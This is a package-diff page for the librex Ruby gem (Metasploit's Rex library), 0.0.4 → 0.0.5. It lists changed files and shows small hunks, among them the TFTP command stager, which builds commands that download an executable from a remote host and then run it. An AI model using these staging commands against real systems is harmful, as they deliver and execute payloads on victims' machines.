RubyGems - librex - Versions diffs - 0.0.4 → 0.0.5 - Mend

librex 0.0.4 → 0.0.5

Files changed (389) hide show

data/README.md +12 -0
data/lib/rex.rb +0 -0
data/lib/rex.rb.ts.rb +0 -0
data/lib/rex/LICENSE +0 -0
data/lib/rex/arch.rb +0 -0
data/lib/rex/arch/sparc.rb +0 -0
data/lib/rex/arch/sparc.rb.ut.rb +0 -0
data/lib/rex/arch/x86.rb +0 -0
data/lib/rex/arch/x86.rb.ut.rb +0 -0
data/lib/rex/assembly/nasm.rb +0 -0
data/lib/rex/assembly/nasm.rb.ut.rb +0 -0
data/lib/rex/codepage.map +0 -0
data/lib/rex/compat.rb +0 -0
data/lib/rex/constants.rb +0 -0
data/lib/rex/elfparsey.rb +0 -0
data/lib/rex/elfparsey/elf.rb +0 -0
data/lib/rex/elfparsey/elfbase.rb +2 -4
data/lib/rex/elfparsey/exceptions.rb +0 -0
data/lib/rex/elfscan.rb +0 -0
data/lib/rex/elfscan/scanner.rb +0 -0
data/lib/rex/elfscan/search.rb +10 -10
data/lib/rex/encoder/alpha2.rb +0 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +0 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +0 -0
data/lib/rex/encoder/alpha2/generic.rb +0 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +0 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +0 -0
data/lib/rex/encoder/ndr.rb +0 -0
data/lib/rex/encoder/ndr.rb.ut.rb +0 -0
data/lib/rex/encoder/nonalpha.rb +0 -0
data/lib/rex/encoder/nonupper.rb +0 -0
data/lib/rex/encoder/xdr.rb +0 -0
data/lib/rex/encoder/xdr.rb.ut.rb +0 -0
data/lib/rex/encoder/xor.rb +0 -0
data/lib/rex/encoder/xor/dword.rb +0 -0
data/lib/rex/encoder/xor/dword_additive.rb +0 -0
data/lib/rex/encoders/xor_dword.rb +0 -0
data/lib/rex/encoders/xor_dword_additive.rb +0 -0
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -0
data/lib/rex/encoding/xor.rb +0 -0
data/lib/rex/encoding/xor.rb.ts.rb +0 -0
data/lib/rex/encoding/xor/byte.rb +0 -0
data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -0
data/lib/rex/encoding/xor/dword.rb +0 -0
data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -0
data/lib/rex/encoding/xor/dword_additive.rb +0 -0
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -0
data/lib/rex/encoding/xor/exceptions.rb +0 -0
data/lib/rex/encoding/xor/generic.rb +0 -0
data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -0
data/lib/rex/encoding/xor/qword.rb +0 -0
data/lib/rex/encoding/xor/word.rb +0 -0
data/lib/rex/encoding/xor/word.rb.ut.rb +0 -0
data/lib/rex/exceptions.rb +0 -0
data/lib/rex/exceptions.rb.ut.rb +0 -0
data/lib/rex/exploitation/cmdstager.rb +0 -0
data/lib/rex/exploitation/cmdstager/base.rb +6 -1
data/lib/rex/exploitation/cmdstager/debug_asm.rb +0 -0
data/lib/rex/exploitation/cmdstager/debug_write.rb +0 -0
data/lib/rex/exploitation/cmdstager/tftp.rb +8 -8
data/lib/rex/exploitation/cmdstager/vbs.rb +0 -0
data/lib/rex/exploitation/egghunter.rb +143 -36
data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -0
data/lib/rex/exploitation/encryptjs.rb +0 -0
data/lib/rex/exploitation/heaplib.js.b64 +0 -0
data/lib/rex/exploitation/heaplib.rb +0 -0
data/lib/rex/exploitation/javascriptosdetect.rb +114 -15
data/lib/rex/exploitation/obfuscatejs.rb +0 -0
data/lib/rex/exploitation/omelet.rb +320 -0
data/lib/rex/exploitation/omelet.rb.ut.rb +13 -0
data/lib/rex/exploitation/opcodedb.rb +0 -0
data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -0
data/lib/rex/exploitation/seh.rb +0 -0
data/lib/rex/exploitation/seh.rb.ut.rb +0 -0
data/lib/rex/file.rb +1 -1
data/lib/rex/file.rb.ut.rb +0 -0
data/lib/rex/image_source.rb +0 -0
data/lib/rex/image_source/disk.rb +0 -0
data/lib/rex/image_source/image_source.rb +0 -0
data/lib/rex/image_source/memory.rb +0 -0
data/lib/rex/io/bidirectional_pipe.rb +0 -0
data/lib/rex/io/datagram_abstraction.rb +0 -0
data/lib/rex/io/stream.rb +1 -1
data/lib/rex/io/stream_abstraction.rb +0 -0
data/lib/rex/io/stream_server.rb +0 -0
data/lib/rex/job_container.rb +0 -1
data/lib/rex/logging.rb +0 -0
data/lib/rex/logging/log_dispatcher.rb +0 -0
data/lib/rex/logging/log_sink.rb +0 -0
data/lib/rex/logging/sinks/flatfile.rb +0 -0
data/lib/rex/logging/sinks/stderr.rb +0 -0
data/lib/rex/machparsey.rb +0 -0
data/lib/rex/machparsey/exceptions.rb +0 -0
data/lib/rex/machparsey/machbase.rb +0 -0
data/lib/rex/machscan.rb +0 -0
data/lib/rex/machscan/scanner.rb +0 -0
data/lib/rex/mime.rb +0 -0
data/lib/rex/mime/header.rb +0 -0
data/lib/rex/mime/message.rb +0 -0
data/lib/rex/mime/part.rb +0 -0
data/lib/rex/nop/opty2.rb +0 -0
data/lib/rex/nop/opty2.rb.ut.rb +0 -0
data/lib/rex/nop/opty2_tables.rb +0 -0
data/lib/rex/ole.rb +0 -0
data/lib/rex/ole/clsid.rb +0 -0
data/lib/rex/ole/difat.rb +0 -0
data/lib/rex/ole/directory.rb +0 -0
data/lib/rex/ole/direntry.rb +0 -0
data/lib/rex/ole/docs/dependencies.txt +8 -0
data/lib/rex/ole/docs/references.txt +1 -0
data/lib/rex/ole/fat.rb +0 -0
data/lib/rex/ole/header.rb +3 -3
data/lib/rex/ole/minifat.rb +0 -0
data/lib/rex/ole/storage.rb +4 -4
data/lib/rex/ole/stream.rb +0 -0
data/lib/rex/ole/substorage.rb +0 -0
data/lib/rex/ole/util.rb +0 -0
data/lib/rex/parser/arguments.rb +0 -0
data/lib/rex/parser/arguments.rb.ut.rb +0 -0
data/lib/rex/parser/ini.rb +0 -0
data/lib/rex/parser/ini.rb.ut.rb +0 -0
data/lib/rex/parser/nexpose_xml.rb +0 -0
data/lib/rex/parser/nmap_xml.rb +0 -0
data/lib/rex/payloads.rb +0 -0
data/lib/rex/payloads/win32.rb +0 -0
data/lib/rex/payloads/win32/common.rb +0 -0
data/lib/rex/payloads/win32/kernel.rb +0 -0
data/lib/rex/payloads/win32/kernel/common.rb +0 -0
data/lib/rex/payloads/win32/kernel/migration.rb +0 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +0 -0
data/lib/rex/peparsey.rb +0 -0
data/lib/rex/peparsey/exceptions.rb +0 -0
data/lib/rex/peparsey/pe.rb +7 -1
data/lib/rex/peparsey/pe_memdump.rb +0 -0
data/lib/rex/peparsey/pebase.rb +27 -2
data/lib/rex/peparsey/section.rb +0 -0
data/lib/rex/pescan.rb +0 -0
data/lib/rex/pescan/analyze.rb +0 -0
data/lib/rex/pescan/scanner.rb +0 -0
data/lib/rex/pescan/search.rb +0 -0
data/lib/rex/platforms.rb +0 -0
data/lib/rex/platforms/windows.rb +0 -0
data/lib/rex/poly.rb +0 -0
data/lib/rex/poly/block.rb +0 -0
data/lib/rex/poly/register.rb +0 -0
data/lib/rex/poly/register/x86.rb +0 -0
data/lib/rex/post.rb +0 -0
data/lib/rex/post/dir.rb +0 -0
data/lib/rex/post/file.rb +0 -0
data/lib/rex/post/file_stat.rb +0 -0
data/lib/rex/post/gen.pl +0 -0
data/lib/rex/post/io.rb +0 -0
data/lib/rex/post/meterpreter.rb +0 -0
data/lib/rex/post/meterpreter/channel.rb +0 -0
data/lib/rex/post/meterpreter/channel_container.rb +0 -0
data/lib/rex/post/meterpreter/channels/pool.rb +0 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +0 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +0 -0
data/lib/rex/post/meterpreter/channels/stream.rb +0 -0
data/lib/rex/post/meterpreter/client.rb +3 -0
data/lib/rex/post/meterpreter/client_core.rb +0 -0
data/lib/rex/post/meterpreter/dependencies.rb +0 -0
data/lib/rex/post/meterpreter/extension.rb +0 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +0 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +0 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +0 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +0 -0
data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +57 -0
data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +15 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +0 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +0 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +0 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +0 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +2 -1
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +12 -10
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +31 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +0 -0
data/lib/rex/post/meterpreter/extensions/{railgun → stdapi/railgun}/api_constants.rb +38106 -38105
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +1804 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +96 -0
data/lib/rex/post/meterpreter/extensions/{railgun → stdapi/railgun/def}/def_kernel32.rb +3848 -3678
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +153 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +21 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +3169 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +599 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/model.rb +540 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +308 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +196 -0
data/lib/rex/post/meterpreter/extensions/{railgun → stdapi/railgun}/tlv.rb +6 -9
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +5 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +0 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +6 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +0 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +0 -0
data/lib/rex/post/meterpreter/object_aliases.rb +0 -0
data/lib/rex/post/meterpreter/packet.rb +23 -1
data/lib/rex/post/meterpreter/packet_dispatcher.rb +13 -2
data/lib/rex/post/meterpreter/packet_parser.rb +0 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +17 -10
data/lib/rex/post/meterpreter/ui/console.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +12 -7
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +221 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +4 -3
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +56 -1
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +22 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +0 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +0 -0
data/lib/rex/post/permission.rb +0 -0
data/lib/rex/post/process.rb +0 -0
data/lib/rex/post/thread.rb +0 -0
data/lib/rex/post/ui.rb +0 -0
data/lib/rex/proto.rb +0 -0
data/lib/rex/proto.rb.ts.rb +0 -0
data/lib/rex/proto/dcerpc.rb +0 -0
data/lib/rex/proto/dcerpc.rb.ts.rb +0 -0
data/lib/rex/proto/dcerpc/client.rb +3 -1
data/lib/rex/proto/dcerpc/exceptions.rb +0 -0
data/lib/rex/proto/dcerpc/handle.rb +0 -0
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -0
data/lib/rex/proto/dcerpc/ndr.rb +0 -0
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -0
data/lib/rex/proto/dcerpc/packet.rb +0 -0
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -0
data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -0
data/lib/rex/proto/dcerpc/uuid.rb +0 -0
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -0
data/lib/rex/proto/dhcp.rb +7 -0
data/lib/rex/proto/dhcp/constants.rb +33 -0
data/lib/rex/proto/dhcp/server.rb +285 -0
data/lib/rex/proto/drda.rb +0 -0
data/lib/rex/proto/drda.rb.ts.rb +0 -0
data/lib/rex/proto/drda/constants.rb +0 -0
data/lib/rex/proto/drda/constants.rb.ut.rb +0 -0
data/lib/rex/proto/drda/packet.rb +0 -0
data/lib/rex/proto/drda/packet.rb.ut.rb +0 -0
data/lib/rex/proto/drda/utils.rb +0 -0
data/lib/rex/proto/drda/utils.rb.ut.rb +0 -0
data/lib/rex/proto/http.rb +0 -0
data/lib/rex/proto/http.rb.ts.rb +0 -0
data/lib/rex/proto/http/client.rb +27 -2
data/lib/rex/proto/http/client.rb.ut.rb +4 -2
data/lib/rex/proto/http/handler.rb +0 -0
data/lib/rex/proto/http/handler/erb.rb +0 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -0
data/lib/rex/proto/http/handler/proc.rb +6 -0
data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -0
data/lib/rex/proto/http/header.rb +0 -0
data/lib/rex/proto/http/header.rb.ut.rb +0 -0
data/lib/rex/proto/http/packet.rb +20 -19
data/lib/rex/proto/http/packet.rb.ut.rb +0 -0
data/lib/rex/proto/http/request.rb +0 -0
data/lib/rex/proto/http/request.rb.ut.rb +0 -0
data/lib/rex/proto/http/response.rb +0 -0
data/lib/rex/proto/http/response.rb.ut.rb +0 -0
data/lib/rex/proto/http/server.rb +5 -3
data/lib/rex/proto/http/server.rb.ut.rb +0 -0
data/lib/rex/proto/proxy/socks4a.rb +440 -0
data/lib/rex/proto/smb.rb +0 -0
data/lib/rex/proto/smb.rb.ts.rb +0 -0
data/lib/rex/proto/smb/client.rb +110 -61
data/lib/rex/proto/smb/client.rb.ut.rb +0 -0
data/lib/rex/proto/smb/constants.rb +5 -3
data/lib/rex/proto/smb/constants.rb.ut.rb +0 -0
data/lib/rex/proto/smb/crypt.rb +0 -0
data/lib/rex/proto/smb/crypt.rb.ut.rb +0 -0
data/lib/rex/proto/smb/exceptions.rb +0 -0
data/lib/rex/proto/smb/simpleclient.rb +0 -0
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -0
data/lib/rex/proto/smb/utils.rb +2 -0
data/lib/rex/proto/smb/utils.rb.ut.rb +0 -0
data/lib/rex/proto/sunrpc.rb +0 -0
data/lib/rex/proto/sunrpc/client.rb +0 -0
data/lib/rex/proto/tftp.rb +10 -1
data/lib/rex/proto/tftp/constants.rb +5 -3
data/lib/rex/proto/tftp/server.rb +79 -9
data/lib/rex/script.rb +0 -0
data/lib/rex/script/base.rb +0 -0
data/lib/rex/script/meterpreter.rb +0 -0
data/lib/rex/script/shell.rb +0 -0
data/lib/rex/service.rb +0 -0
data/lib/rex/service_manager.rb +0 -0
data/lib/rex/service_manager.rb.ut.rb +0 -0
data/lib/rex/services/local_relay.rb +0 -0
data/lib/rex/socket.rb +6 -4
data/lib/rex/socket.rb.ut.rb +0 -0
data/lib/rex/socket/comm.rb +0 -0
data/lib/rex/socket/comm/local.rb +0 -0
data/lib/rex/socket/comm/local.rb.ut.rb +0 -0
data/lib/rex/socket/ip.rb +0 -0
data/lib/rex/socket/parameters.rb +0 -0
data/lib/rex/socket/parameters.rb.ut.rb +0 -0
data/lib/rex/socket/range_walker.rb +0 -0
data/lib/rex/socket/range_walker.rb.ut.rb +0 -0
data/lib/rex/socket/ssl_tcp.rb +1 -1
data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -0
data/lib/rex/socket/ssl_tcp_server.rb +0 -0
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -0
data/lib/rex/socket/subnet_walker.rb +0 -0
data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -0
data/lib/rex/socket/switch_board.rb.ut.rb +0 -0
data/lib/rex/socket/tcp.rb +0 -0
data/lib/rex/socket/tcp.rb.ut.rb +0 -0
data/lib/rex/socket/tcp_server.rb +0 -0
data/lib/rex/socket/tcp_server.rb.ut.rb +0 -0
data/lib/rex/socket/udp.rb +0 -0
data/lib/rex/socket/udp.rb.ut.rb +0 -0
data/lib/rex/struct2.rb +0 -0
data/lib/rex/struct2/c_struct.rb +0 -0
data/lib/rex/struct2/c_struct_template.rb +0 -0
data/lib/rex/struct2/constant.rb +0 -0
data/lib/rex/struct2/element.rb +0 -0
data/lib/rex/struct2/generic.rb +0 -0
data/lib/rex/struct2/restraint.rb +0 -0
data/lib/rex/struct2/s_string.rb +0 -0
data/lib/rex/struct2/s_struct.rb +0 -0
data/lib/rex/sync.rb +0 -0
data/lib/rex/sync/event.rb +0 -0
data/lib/rex/sync/read_write_lock.rb +0 -0
data/lib/rex/sync/ref.rb +0 -0
data/lib/rex/sync/thread_safe.rb +0 -0
data/lib/rex/test.rb +0 -0
data/lib/rex/text.rb +13 -3
data/lib/rex/text.rb.ut.rb +9 -4
data/lib/rex/time.rb +0 -0
data/lib/rex/transformer.rb +0 -0
data/lib/rex/transformer.rb.ut.rb +0 -0
data/lib/rex/ui.rb +0 -0
data/lib/rex/ui/interactive.rb +0 -0
data/lib/rex/ui/output.rb +0 -0
data/lib/rex/ui/output/none.rb +0 -0
data/lib/rex/ui/progress_tracker.rb +0 -0
data/lib/rex/ui/subscriber.rb +0 -0
data/lib/rex/ui/text/color.rb +0 -0
data/lib/rex/ui/text/color.rb.ut.rb +0 -0
data/lib/rex/ui/text/dispatcher_shell.rb +0 -0
data/lib/rex/ui/text/input.rb +0 -0
data/lib/rex/ui/text/input/buffer.rb +0 -0
data/lib/rex/ui/text/input/readline.rb +0 -0
data/lib/rex/ui/text/input/socket.rb +0 -0
data/lib/rex/ui/text/input/stdio.rb +0 -0
data/lib/rex/ui/text/irb_shell.rb +0 -0
data/lib/rex/ui/text/output.rb +0 -0
data/lib/rex/ui/text/output/buffer.rb +0 -0
data/lib/rex/ui/text/output/file.rb +0 -0
data/lib/rex/ui/text/output/socket.rb +0 -0
data/lib/rex/ui/text/output/stdio.rb +0 -0
data/lib/rex/ui/text/progress_tracker.rb +0 -0
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -0
data/lib/rex/ui/text/shell.rb +9 -6
data/lib/rex/ui/text/table.rb +5 -0
data/lib/rex/ui/text/table.rb.ut.rb +0 -0
data/lib/rex/zip.rb +0 -0
data/lib/rex/zip/archive.rb +29 -1
data/lib/rex/zip/blocks.rb +0 -0
data/lib/rex/zip/entry.rb +5 -1
metadata +369 -413
data/README +0 -8
data/lib/rex/post/meterpreter/extensions/railgun/api.rb +0 -9303
data/lib/rex/post/meterpreter/extensions/railgun/railgun.rb +0 -815
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/railgun.rb +0 -57

data/README.md ADDED

@@ -0,0 +1,12 @@
+REX
+===
+A non-official re-packaging of the Rex library as a gem for easy of usage of the Metasploit REX framework in a non Metasploit application. I received permission from HDM to create this package.
+Currently based on:
+SVN Revision: 10547
+Credits
+===
+The Metasploit development team <http://www.metasploit.com>

data/lib/rex.rb CHANGED

File without changes

data/lib/rex.rb.ts.rb CHANGED

File without changes

data/lib/rex/LICENSE CHANGED

File without changes

data/lib/rex/arch.rb CHANGED

File without changes

data/lib/rex/arch/sparc.rb CHANGED

File without changes

data/lib/rex/arch/sparc.rb.ut.rb CHANGED

File without changes

data/lib/rex/arch/x86.rb CHANGED

File without changes

data/lib/rex/arch/x86.rb.ut.rb CHANGED

File without changes

data/lib/rex/assembly/nasm.rb CHANGED

File without changes

data/lib/rex/assembly/nasm.rb.ut.rb CHANGED

File without changes

data/lib/rex/codepage.map CHANGED

File without changes

data/lib/rex/compat.rb CHANGED

File without changes

data/lib/rex/constants.rb CHANGED

File without changes

data/lib/rex/elfparsey.rb CHANGED

File without changes

data/lib/rex/elfparsey/elf.rb CHANGED

File without changes

data/lib/rex/elfparsey/elfbase.rb CHANGED

@@ -1,6 +1,6 @@
 #!/usr/bin/env ruby
-# $Id: elfbase.rb 6615 2009-06-03 01:39:54Z hdm $
+# $Id: elfbase.rb 9937 2010-07-27 18:03:18Z jduck $
 require 'rex/struct2'
@@ -192,7 +192,7 @@ class ElfBase
 	# Program Header
-	PROGRAM_HEADER_SIZE = 36
+	PROGRAM_HEADER_SIZE = 32
 	ELF32_PHDR_LSB = Rex::Struct2::CStructTemplate.new(
 		[ 'uint32v', 'p_type',   0 ],
@@ -200,7 +200,6 @@ class ElfBase
 		[ 'uint32v', 'p_vaddr',  0 ],
 		[ 'uint32v', 'p_paddr',  0 ],
 		[ 'uint32v', 'p_filesz', 0 ],
-		[ 'uint32v', 'p_filesz', 0 ],
 		[ 'uint32v', 'p_memsz',  0 ],
 		[ 'uint32v', 'p_flags',  0 ],
 		[ 'uint32v', 'p_align',  0 ]
@@ -212,7 +211,6 @@ class ElfBase
 		[ 'uint32n', 'p_vaddr',  0 ],
 		[ 'uint32n', 'p_paddr',  0 ],
 		[ 'uint32n', 'p_filesz', 0 ],
-		[ 'uint32n', 'p_filesz', 0 ],
 		[ 'uint32n', 'p_memsz',  0 ],
 		[ 'uint32n', 'p_flags',  0 ],
 		[ 'uint32n', 'p_align',  0 ]

data/lib/rex/elfparsey/exceptions.rb CHANGED

File without changes

data/lib/rex/elfscan.rb CHANGED

File without changes

data/lib/rex/elfscan/scanner.rb CHANGED

File without changes

data/lib/rex/elfscan/search.rb CHANGED

@@ -1,6 +1,6 @@
 #!/usr/bin/env ruby
-# $Id: search.rb 5413 2008-02-13 02:43:56Z ramon $
+# $Id: search.rb 10173 2010-08-27 21:26:59Z jduck $
 module Rex
 module ElfScan
@@ -8,29 +8,29 @@ module Search
 	class DumpRVA
 		attr_accessor :elf
 		def initialize(elf)
 			self.elf = elf
 		end
 		def config(param)
 			@address = param['args']
 		end
 		def scan(param)
 			config(param)
 			$stdout.puts "[#{param['file']}]"
 			# Adjust based on -A and -B flags
 			pre = param['before'] || 0
 			suf = param['after']  || 16
 			@address -= pre
 			@address = 0 if (@address < 0 || ! @address)
 			buf = elf.read_rva(@address, suf)
 			$stdout.puts elf.ptr_s(@address) + " " + buf.unpack("H*")[0]
-		end
+		end
 	end
 	class DumpOffset < DumpRVA
@@ -40,7 +40,7 @@ module Search
 			rescue Rex::ElfParsey::BoundsError
 			end
 		end
-	end
+	end
+end
 end
 end
-end

data/lib/rex/encoder/alpha2.rb CHANGED

File without changes

data/lib/rex/encoder/alpha2/alpha_mixed.rb CHANGED

File without changes

data/lib/rex/encoder/alpha2/alpha_upper.rb CHANGED

File without changes

data/lib/rex/encoder/alpha2/generic.rb CHANGED

File without changes

data/lib/rex/encoder/alpha2/unicode_mixed.rb CHANGED

File without changes

data/lib/rex/encoder/alpha2/unicode_upper.rb CHANGED

File without changes

data/lib/rex/encoder/ndr.rb CHANGED

File without changes

data/lib/rex/encoder/ndr.rb.ut.rb CHANGED

File without changes

data/lib/rex/encoder/nonalpha.rb CHANGED

File without changes

data/lib/rex/encoder/nonupper.rb CHANGED

File without changes

data/lib/rex/encoder/xdr.rb CHANGED

File without changes

data/lib/rex/encoder/xdr.rb.ut.rb CHANGED

File without changes

data/lib/rex/encoder/xor.rb CHANGED

File without changes

data/lib/rex/encoder/xor/dword.rb CHANGED

File without changes

data/lib/rex/encoder/xor/dword_additive.rb CHANGED

File without changes

data/lib/rex/encoders/xor_dword.rb CHANGED

File without changes

data/lib/rex/encoders/xor_dword_additive.rb CHANGED

File without changes

data/lib/rex/encoders/xor_dword_additive.rb.ut.rb CHANGED

File without changes

data/lib/rex/encoding/xor.rb CHANGED

File without changes

data/lib/rex/encoding/xor.rb.ts.rb CHANGED

File without changes

data/lib/rex/encoding/xor/byte.rb CHANGED

File without changes

data/lib/rex/encoding/xor/byte.rb.ut.rb CHANGED

File without changes

data/lib/rex/encoding/xor/dword.rb CHANGED

File without changes

data/lib/rex/encoding/xor/dword.rb.ut.rb CHANGED

File without changes

data/lib/rex/encoding/xor/dword_additive.rb CHANGED

File without changes

data/lib/rex/encoding/xor/dword_additive.rb.ut.rb CHANGED

File without changes

data/lib/rex/encoding/xor/exceptions.rb CHANGED

File without changes

data/lib/rex/encoding/xor/generic.rb CHANGED

File without changes

data/lib/rex/encoding/xor/generic.rb.ut.rb CHANGED

File without changes

data/lib/rex/encoding/xor/qword.rb CHANGED

File without changes

data/lib/rex/encoding/xor/word.rb CHANGED

File without changes

data/lib/rex/encoding/xor/word.rb.ut.rb CHANGED

File without changes

data/lib/rex/exceptions.rb CHANGED

File without changes

data/lib/rex/exceptions.rb.ut.rb CHANGED

File without changes

data/lib/rex/exploitation/cmdstager.rb CHANGED

File without changes

data/lib/rex/exploitation/cmdstager/base.rb CHANGED

@@ -127,6 +127,11 @@ class CmdStagerBase
 		new_cmds = []
 		line = ''
 		concat = cmd_concat_operator
+		# We cannot compress commands if there is no way to combine commands on
+		# a single line.
+		return cmds if not concat
 		cmds.each { |cmd|
 			# If this command will fit, concat it and move on.
@@ -162,7 +167,7 @@ class CmdStagerBase
 	# Can be overriden.  For exmaple, use for unix use ";" instead
 	#
 	def cmd_concat_operator
-		""
+		nil
 	end
 end

data/lib/rex/exploitation/cmdstager/debug_asm.rb CHANGED

File without changes

data/lib/rex/exploitation/cmdstager/debug_write.rb CHANGED

File without changes

data/lib/rex/exploitation/cmdstager/tftp.rb CHANGED

@@ -1,5 +1,5 @@
 ##
-# $Id: tftp.rb 9375 2010-05-26 22:39:56Z jduck $
+# $Id: tftp.rb 10169 2010-08-27 17:23:47Z jduck $
 ##
 require 'rex/text'
@@ -30,7 +30,7 @@ class CmdStagerTFTP < CmdStagerBase
 	def initialize(exe)
 		super
-		@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
+		@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
 	end
@@ -40,10 +40,10 @@ class CmdStagerTFTP < CmdStagerBase
 	#
 	def compress_commands(cmds, opts)
 		# Initiate the download
-		cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @var_payload_out}"
+		cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
 		# Make it all happen
-		cmds << "start #{@tempdir + @var_payload_out}"
+		cmds << "start #{@tempdir + @payload_exe}"
 		# Clean up after unless requested not to..
 		if (not opts[:nodelete])
@@ -53,11 +53,11 @@ class CmdStagerTFTP < CmdStagerBase
 		super
 	end
-	# Windows uses & to concat strings
-	def cmd_concat_operator
-		" & "
-	end
+	# NOTE: We don't use a concatenation operator here since we only have a couple commands.
